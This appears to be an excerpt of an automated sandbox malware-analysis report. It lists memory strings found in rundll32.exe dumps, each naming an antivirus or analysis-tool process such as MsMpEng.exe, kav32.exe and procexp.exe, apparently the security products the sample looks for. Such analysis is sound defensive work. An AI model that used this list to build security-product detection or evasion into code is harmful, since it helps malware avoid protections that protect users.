    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239308691.0000025BF0143000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nspupsvc.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163928030.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239485675.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521925258.0000025BF009A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCANMSG.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DA8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3315134591.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387089360.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: apvxdwin.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3011934316.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012065404.0000025BF012E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387123364.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239614242.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862490782.0000025BEE2E8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862052201.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PAVFNSVR.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3089047921.0000025BF00E8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088903388.0000025BF00E1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: f-stopw.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935104556.0000025BF00EC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415074967.0000025BEE2D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgwdsvc.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562895894.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521806811.0000025BEE2E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935513236.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488136352.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fsav.exe
    Source: rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563049239.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521806811.0000025BEE2E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3011934316.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3314134932.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387123364.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935242512.0000025BF0145000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: mcupdate.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414881638.0000025BEE292000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3089047921.0000025BF00E8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: fp-win.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DRWEBSCD.EXE
    Source: rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414881638.0000025BEE292000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: fsav530wtbyb.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562895894.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163768478.0000025BF016E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2640578474.0000025BF00E1000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zlclient.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563029837.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387106733.0000025BEE2E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PSHost.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DA8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3315134591.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461748687.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: avgamsvr.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415074967.0000025BEE2D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088903388.0000025BF00E1000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487942965.0000025BF00DF000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935290329.0000025BF00D6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562770497.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ashWebSv.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415074967.0000025BEE2D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3315134591.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgtray.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163928030.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239485675.0000025BF009B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SBAMSvc.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415074967.0000025BEE2D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: drwebscd.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DA8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TmPfw.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163908029.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: procexp.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FSM32.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: GUARDXKICKOFF.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088610386.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3089140201.0000025BF012E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461916716.0000025BEE2E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PavFnSvr.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3522323197.0000025BF0176000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461748687.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3089047921.0000025BF00E8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088903388.0000025BF00E1000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862282262.0000025BF00E5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: f-prot95.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DA8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387089360.0000025BF0173000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: WebProxy.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AVKProxy.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414881638.0000025BEE292000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: kav32.exe
